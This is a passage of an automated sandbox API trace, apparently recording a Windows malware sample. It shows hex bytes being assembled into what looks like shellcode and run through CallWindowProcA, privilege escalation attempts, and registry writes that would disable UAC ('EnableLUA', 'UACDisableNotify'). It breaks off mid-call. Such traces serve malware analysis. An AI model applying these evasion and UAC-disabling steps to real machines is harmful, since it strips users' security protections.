VarI2FromStr (in: strIn="&H1C", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.792] VarI2FromStr (in: strIn="&H85", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.792] VarI2FromStr (in: strIn="&HED", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.792] VarI2FromStr (in: strIn="&H74", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.793] VarI2FromStr (in: strIn="&H43", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.793] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.793] VarI2FromStr (in: strIn="&H45", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.794] VarI2FromStr (in: strIn="&H3C", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.794] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.794] VarI2FromStr (in: strIn="&H54", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.794] VarI2FromStr (in: strIn="&H05", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.795] VarI2FromStr (in: strIn="&H78", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.795] VarI2FromStr (in: strIn="&H01", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.795] VarI2FromStr (in: strIn="&HEA", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.796] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.796] VarI2FromStr (in: strIn="&H4A", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.796] VarI2FromStr (in: strIn="&H18", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.797] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.797] VarI2FromStr (in: strIn="&H5A", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.797] VarI2FromStr (in: strIn="&H20", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.797] VarI2FromStr (in: strIn="&H01", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.803] VarI2FromStr (in: strIn="&HEB", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.804] VarI2FromStr (in: strIn="&HE3", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.804] VarI2FromStr (in: strIn="&H30", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.804] VarI2FromStr (in: strIn="&H49", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.805] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.805] VarI2FromStr (in: strIn="&H34", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.805] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.806] VarI2FromStr (in: strIn="&H01", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.806] VarI2FromStr (in: strIn="&HEE", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.806] VarI2FromStr (in: strIn="&H31", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.806] VarI2FromStr (in: strIn="&HFF", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.807] VarI2FromStr (in: strIn="&H31", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.807] VarI2FromStr (in: strIn="&HC0", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.807] VarI2FromStr (in: strIn="&HFC", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.808] VarI2FromStr (in: strIn="&HAC", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.808] VarI2FromStr (in: strIn="&H84", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.808] VarI2FromStr (in: strIn="&HC0", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.809] VarI2FromStr (in: strIn="&H74", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.809] VarI2FromStr (in: strIn="&H07", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.809] VarI2FromStr (in: strIn="&HC1", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.810] VarI2FromStr (in: strIn="&HCF", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.810] VarI2FromStr (in: strIn="&H0D", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.810] VarI2FromStr (in: strIn="&H01", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.811] VarI2FromStr (in: strIn="&HC7", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.811] VarI2FromStr (in: strIn="&HEB", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.811] VarI2FromStr (in: strIn="&HF4", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.811] VarI2FromStr (in: strIn="&H3B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.812] VarI2FromStr (in: strIn="&H7C", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.812] VarI2FromStr (in: strIn="&H24", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.812] VarI2FromStr (in: strIn="&H20", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.813] VarI2FromStr (in: strIn="&H75", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.813] VarI2FromStr (in: strIn="&HE1", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.813] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.879] VarI2FromStr (in: strIn="&H5A", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.879] VarI2FromStr (in: strIn="&H24", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.880] VarI2FromStr (in: strIn="&H01", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.880] VarI2FromStr (in: strIn="&HEB", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.880] VarI2FromStr (in: strIn="&H66", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.881] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.881] VarI2FromStr (in: strIn="&H0C", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.881] VarI2FromStr (in: strIn="&H4B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.882] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.882] VarI2FromStr (in: strIn="&H5A", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.882] VarI2FromStr (in: strIn="&H1C", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.882] VarI2FromStr (in: strIn="&H01", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.883] VarI2FromStr (in: strIn="&HEB", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.883] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.883] VarI2FromStr (in: strIn="&H04", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.884] VarI2FromStr (in: strIn="&H8B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.884] VarI2FromStr (in: strIn="&H01", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.884] VarI2FromStr (in: strIn="&HE8", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.885] VarI2FromStr (in: strIn="&H5F", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.885] VarI2FromStr (in: strIn="&H5E", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.885] VarI2FromStr (in: strIn="&H5B", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.886] VarI2FromStr (in: strIn="&H59", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.886] VarI2FromStr (in: strIn="&H5A", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.886] VarI2FromStr (in: strIn="&H5D", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.886] VarI2FromStr (in: strIn="&HC3", lcid=0x409, dwFlags=0x0, psOut=0x18f536 | out: psOut=0x18f536) returned 0x0 [0194.887] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.887] CallWindowProcA (lpPrevWndFunc=0x5ded58, hWnd=0x5dd2c4, Msg=0xa045657b, wParam=0x0, lParam=0x0) returned 0x77ed1f40 [0194.887] LoadLibraryW (lpLibFileName="ntdll") returned 0x77e20000 [0194.887] GetLastError () returned 0x578 [0194.887] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.887] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.887] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.887] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.887] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.887] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.887] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.888] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.888] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.888] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.888] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0xc000007c [0194.888] RtlAdjustPrivilege (in: Privilege=0x9, NewValue=1, ForThread=1, OldValue=0x0 | out: OldValue=0x0) returned 0xc000007c [0194.888] GetLastError () returned 0x578 [0194.888] SafeArrayDestroyDescriptor (psa=0x5e3660) returned 0x0 [0194.888] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0194.888] CallWindowProcA (lpPrevWndFunc=0x5ded58, hWnd=0x5dd2dc, Msg=0xa045657b, wParam=0x0, lParam=0x0) returned 0x77ed1f40 [0194.888] LoadLibraryW (lpLibFileName="ntdll") returned 0x77e20000 [0194.888] GetLastError () returned 0x578 [0194.888] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.888] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.888] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.889] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.889] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.889] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.889] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.889] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.889] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.889] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.889] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0xc000007c [0194.889] RtlAdjustPrivilege (in: Privilege=0x11, NewValue=1, ForThread=1, OldValue=0x0 | out: OldValue=0x0) returned 0xc000007c [0194.889] GetLastError () returned 0x578 [0194.889] SafeArrayDestroyDescriptor (psa=0x5e3660) returned 0x0 [0194.889] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0194.889] CallWindowProcA (lpPrevWndFunc=0x5ded58, hWnd=0x5dd2dc, Msg=0xa045657b, wParam=0x0, lParam=0x0) returned 0x77ed1f40 [0194.889] LoadLibraryW (lpLibFileName="ntdll") returned 0x77e20000 [0194.889] GetLastError () returned 0x578 [0194.889] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.889] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.890] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.890] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.890] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.890] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.890] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.890] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.890] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.890] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.890] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0xc000007c [0194.890] RtlAdjustPrivilege (in: Privilege=0x12, NewValue=1, ForThread=1, OldValue=0x0 | out: OldValue=0x0) returned 0xc000007c [0194.890] GetLastError () returned 0x578 [0194.890] SafeArrayDestroyDescriptor (psa=0x5e3660) returned 0x0 [0194.890] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0194.890] CallWindowProcA (lpPrevWndFunc=0x5ded58, hWnd=0x5dd2dc, Msg=0xa045657b, wParam=0x0, lParam=0x0) returned 0x77ed1f40 [0194.890] LoadLibraryW (lpLibFileName="ntdll") returned 0x77e20000 [0194.890] GetLastError () returned 0x578 [0194.890] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.891] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.891] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.891] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.891] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.891] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.891] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.891] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.891] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7d4 | out: ppsaOut=0x18f7d4) returned 0x0 [0194.891] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.891] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0xc000007c [0194.891] RtlAdjustPrivilege (in: Privilege=0x14, NewValue=1, ForThread=1, OldValue=0x0 | out: OldValue=0x0) returned 0xc000007c [0194.891] GetLastError () returned 0x578 [0194.891] SafeArrayDestroyDescriptor (psa=0x5e3660) returned 0x0 [0194.892] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f850 | out: ppsaOut=0x18f850) returned 0x0 [0194.892] CallWindowProcA (lpPrevWndFunc=0x5ded58, hWnd=0x5e0ad4, Msg=0x2922bbf, wParam=0x0, lParam=0x0) returned 0x764a2459 [0194.892] LoadLibraryW (lpLibFileName="advapi32") returned 0x76490000 [0194.892] GetLastError () returned 0x578 [0194.892] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.893] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.893] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.893] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.893] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.893] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.893] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.893] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.893] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0194.893] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Security Center", phkResult=0x18f854 | out: phkResult=0x18f854*=0xf0) returned 0x0 [0194.893] GetLastError () returned 0x578 [0194.893] SafeArrayDestroyDescriptor (psa=0x5e3660) returned 0x0 [0194.893] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f850 | out: ppsaOut=0x18f850) returned 0x0 [0194.893] CallWindowProcA (lpPrevWndFunc=0x5ded58, hWnd=0x5e0ad4, Msg=0x2d1c9af3, wParam=0x0, lParam=0x0) returned 0x764a14d6 [0194.893] LoadLibraryW (lpLibFileName="advapi32") returned 0x76490000 [0194.894] GetLastError () returned 0x578 [0194.894] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.894] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.894] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.894] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.894] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.894] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.894] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.894] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.894] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.894] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.894] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.894] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.894] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.894] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.894] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x5 [0194.894] RegSetValueExW (hKey=0xf0, lpValueName="UACDisableNotify", Reserved=0x0, dwType=0x4, lpData=0x18f8fc, cbData=0x4) returned 0x5 [0194.895] GetLastError () returned 0x578 [0194.895] SafeArrayDestroyDescriptor (psa=0x5e3660) returned 0x0 [0194.895] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f850 | out: ppsaOut=0x18f850) returned 0x0 [0194.895] CallWindowProcA (lpPrevWndFunc=0x5ded58, hWnd=0x5e0afc, Msg=0x2922bbf, wParam=0x0, lParam=0x0) returned 0x764a2459 [0194.895] LoadLibraryW (lpLibFileName="advapi32") returned 0x76490000 [0194.895] GetLastError () returned 0x578 [0194.895] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.895] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.895] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.895] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.895] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.896] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.896] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.896] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.896] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0194.896] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x18f854 | out: phkResult=0x18f854*=0xf4) returned 0x0 [0194.896] GetLastError () returned 0x578 [0194.896] SafeArrayDestroyDescriptor (psa=0x5e3660) returned 0x0 [0194.896] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f850 | out: ppsaOut=0x18f850) returned 0x0 [0194.896] CallWindowProcA (lpPrevWndFunc=0x5ded58, hWnd=0x5e0afc, Msg=0x2d1c9af3, wParam=0x0, lParam=0x0) returned 0x764a14d6 [0194.896] LoadLibraryW (lpLibFileName="advapi32") returned 0x76490000 [0194.896] GetLastError () returned 0x578 [0194.896] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.896] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.896] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.896] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.896] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.896] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.897] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.897] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.897] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.897] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.897] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.897] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.897] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f70c | out: ppsaOut=0x18f70c) returned 0x0 [0194.897] SafeArrayDestroyDescriptor (psa=0x5e3690) returned 0x0 [0194.897] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x5 [0194.897] RegSetValueExW (hKey=0xf4, lpValueName="EnableLUA", Reserved=0x0, dwType=0x4, lpData=0x18f8fc, cbData=0x4) returned 0x5 [0194.897] GetLastError () returned 0x578 [0194.897] SafeArrayDestroyDescriptor (psa=0x5e3660) returned 0x0 [0194.897] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f0 | out: ppsaOut=0x18f8f0) returned 0x0 [0194.897] CallWindowProcA (lpPrevWndFunc=0x5ded58, hWnd=0x5e0afc, Msg=0xdd81ee5e, wParam=0x0, lParam=0x0) returned 0x76235151 [0194.897] LoadLibraryW (lpLibFileName="kernel32") returned 0x76220000 [0194.898] GetLastError () returned 0x578 [0194.898] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7dc | out: ppsaOut=0x18f7dc) returned 0x0 [0194.898] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.898] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7dc | out: ppsaOut=0x18f7dc) returned 0x0 [0194.898] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.898] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7dc | out: ppsaOut=0x18f7dc) returned 0x0 [0194.898] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.898] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f7dc | out: ppsaOut=0x18f7dc) returned 0x0 [0194.898] SafeArrayDestroyDescriptor (psa=0x5e3cb0) returned 0x0 [0194.898] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0194.898] OpenMutexW 